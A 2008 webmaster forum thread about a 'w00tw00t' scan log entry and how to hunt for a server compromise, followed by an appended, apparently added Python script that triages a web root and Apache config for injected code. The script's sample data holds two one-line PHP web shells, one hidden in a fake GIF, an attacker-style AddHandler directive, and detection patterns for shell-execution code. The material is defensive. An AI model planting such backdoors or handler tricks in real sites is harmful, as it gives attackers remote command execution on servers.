
ISC.SANS.DFind


quali73

8:59 am on Sep 21, 2008 (gmt 0)

10+ Year Member



Hello,

I am running a website on a dedicated server. The server is hosted by an ISP who informed me that somebody's server had been 'scanned' and found this in their log.

11.22.33.44 - - [18/Sep/2008:19:28:17 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 332 "-" "-"

where 11.22.33.44 represents my dedicated server IP address

Does anybody know how bad this is, and how do I get rid of /w00tw00t.at.ISC.SANS.DFind from my server?

My ISP is threatening to disable my server, and that would require a full reinstall, which is something I must try to avoid.

[edited by: jdMorgan at 2:08 pm (utc) on Sep. 21, 2008]
[edit reason] Disabled smilies [/edit]

g1smd

11:04 am on Sep 21, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Google returns several thousand results when I search for w00tw00t.at.ISC.SANS.DFind.

Do any of those answer the question? I'd not heard of it before.

quali73

11:55 am on Sep 21, 2008 (gmt 0)

10+ Year Member



I have visited many sites related to it, and to summarise, all I can find about it is:

"It's bots scanning for insecure scripts.
They sit there all day trying thousands of URLs against all the servers they can find, and when they find one they auto-hack it and send the spam."

Now, I guess some pirate could have installed a bot on my server. I don't know how, but for a person to report my server, there is something wrong.

How can I detect which file is culprit for scanning other machines?

jdMorgan

2:18 pm on Sep 21, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



You need to go through all of the script files on your server, looking for any scripts you don't recognize.

To be clear, that means looking for anything on the server that is not a static file like an HTML page or an image, etc.

Look at your server config files, and make sure there are no rewrites or Alias directives pointed to scripts you don't recognize.

If neither of these steps reveals anything, then you will need to edit each of your scripts, and look for code that you don't recognize.

Once you've found something, don't remove it immediately. Instead, you must figure out how it got changed -- You must find the 'hacking' mechanism that was used to compromise your server. Only after fixing that should you remove the actual hack. Some of these things 'phone home' and will replace themselves if you remove them but leave the server open to further hacking.

Best practice also indicates that you should change all of your passwords immediately, and change them to passwords that are 'strong' -- Do a search on strong passwords for more information.

If your site revenue is important to your livelihood, then I'd suggest hiring a security professional to review your entire site unless you feel confident in doing it yourself -- This is a very serious and complex problem. You might contact your host and ask them if they can help you for a fee. Don't try to go cheap: You have a choice here of securing your server or going off-line.

Jim

quali73

2:49 pm on Sep 21, 2008 (gmt 0)

10+ Year Member



oh dear... that sounds like a ginormous amount of checking. I am running apache on windows and currently running a process audit on the machine. I am hoping it will reveal the use of an illegal program at some point.

Is there an antivirus that can detect and destroy this thing?

Is it an .exe file that does this? Or is it a web script? If it is a web script, it would mean it is in my web folder.

jdMorgan

2:56 pm on Sep 21, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



The malicious file could be named anything, and there could be more than one. By adding an AddHandler directive to your server configuration, *any* type of file can be made executable.

If this becomes an unsolvable problem, consider re-uploading your site and switching to "managed" hosting -- Then the problem belongs to the hosting company... :)

I have seen this request in my logs before, coming from compromised servers. I'd be very, very interested in what you find -- Filenames and any/all other information about the hack. As you've seen, there is little authoritative information on the Web, and/or it's hard to find. It would be good to know at least one of the filenames it uses, as a start to pinning down the cause.

Jim
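The three checks Jim lays out above (list every non-static file under the web root, inspect the server config for Alias/Rewrite/AddHandler directives that route requests to scripts, then read the scripts themselves for code you don't recognise), together with his later point that an AddHandler directive can make any extension executable, can be automated as a first-pass triage. The script below is an added example written for this thread, not code from the thread or from any poster; it is Python so it runs the same on the Windows Apache box described here as on a Unix host. The web root, the httpd.conf text, and the "suspicious code" patterns are all constructed for the example: the patterns are rough heuristics for injected PHP/Perl (eval, base64_decode, shell execution, request data flowing into code, remote fetches), not a signature set, and a clean result from them proves nothing on its own.

```python
"""Added example: triage a web root the way the thread describes (constructed data)."""
import os
import re
import tempfile

# Extensions treated as plain static content; everything else gets listed and read.
STATIC_EXTENSIONS = {".html", ".htm", ".css", ".jpg", ".jpeg", ".png", ".gif", ".ico", ".txt"}

# Apache directives that route a URL to a script or make an extension executable.
DIRECTIVE_RE = re.compile(
    r"^[ \t]*(AddHandler|SetHandler|AddType|Action|Alias|ScriptAlias|RewriteRule)[ \t]+(.+?)[ \t]*$",
    re.IGNORECASE | re.MULTILINE,
)

# Constructed heuristics for injected web-shell style code (an assumption, not a signature set).
SUSPICIOUS_PATTERNS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(")),
    ("shell-exec", re.compile(r"\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\(")),
    ("request-to-code", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("remote-fetch", re.compile(r"\b(fsockopen|curl_init|file_get_contents\s*\(\s*['\"]https?://)")),
]

# Constructed sample web root; the two files under images/ are the planted backdoors.
SAMPLE_FILES = {
    "index.html": "<html><body>Hello</body></html>\n",
    "images/logo.png": "\x89PNG fake image bytes\n",
    "cgi-bin/contact.pl": "#!/usr/bin/perl\nprint \"Content-type: text/plain\\n\\nok\\n\";\n",
    "images/thumbs.php": "<?php eval(base64_decode($_POST['c'])); ?>\n",
    "images/banner.gif": "GIF89a<?php system($_GET['cmd']); ?>\n",
}

# Constructed httpd.conf fragment; the php5-script line is the attacker-added one.
SAMPLE_CONFIG = """\
DocumentRoot "C:/www/htdocs"
AddHandler cgi-script .cgi .pl
# constructed: makes every .gif run as PHP, so banner.gif above is live code
AddHandler php5-script .gif
Alias /img/ "C:/www/htdocs/images/"
RewriteRule ^/old/(.*)$ /cgi-bin/contact.pl [L]
"""


def list_files(root):
    """All files under root, root-relative with forward slashes, sorted."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            found.append(rel.replace(os.sep, "/"))
    return sorted(found)


def find_routing_directives(config_text):
    """Step 2: (directive, arguments) pairs that map URLs or extensions to handlers."""
    return [(m.group(1), m.group(2)) for m in DIRECTIVE_RE.finditer(config_text)]


def handlers_for_static_extensions(directives):
    """AddHandler lines that turn a 'static' extension into executable content."""
    flagged = []
    for name, args in directives:
        if name.lower() == "addhandler" and any(p.lower() in STATIC_EXTENSIONS for p in args.split()[1:]):
            flagged.append((name, args))
    return flagged


def scan_script(text):
    """Step 3: labels of suspicious constructs found in one file's source."""
    return [label for label, rx in SUSPICIOUS_PATTERNS if rx.search(text)]


def triage(root, config_text):
    """Run the thread's three checks and return one report dict."""
    all_files = list_files(root)
    directives = find_routing_directives(config_text)
    flagged = handlers_for_static_extensions(directives)
    # Extensions the config has made executable must be read even though they look static.
    exec_exts = {p.lower() for _n, args in flagged for p in args.split()[1:] if p.startswith(".")}
    non_static = [f for f in all_files if os.path.splitext(f)[1].lower() not in STATIC_EXTENSIONS]
    to_scan = [f for f in all_files if f in non_static or os.path.splitext(f)[1].lower() in exec_exts]
    suspicious = {}
    for rel in to_scan:
        with open(os.path.join(root, rel), "r", encoding="utf-8", errors="replace") as fh:
            hits = scan_script(fh.read())
        if hits:
            suspicious[rel] = hits
    return {
        "non_static_files": non_static,
        "directives": directives,
        "executable_static_extensions": flagged,
        "suspicious_scripts": suspicious,
    }


def build_sample_site():
    """Write the constructed web root to a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    report = triage(build_sample_site(), SAMPLE_CONFIG)
    for key, value in report.items():
        print(key, value)
```

Run against a real site, point `triage()` at the DocumentRoot and pass it the concatenated text of httpd.conf, any Include files and every .htaccess under the root; anything in `suspicious_scripts` or `executable_static_extensions` is a lead to inspect by hand, and per Jim's advice the goal is to find how it got there before deleting it.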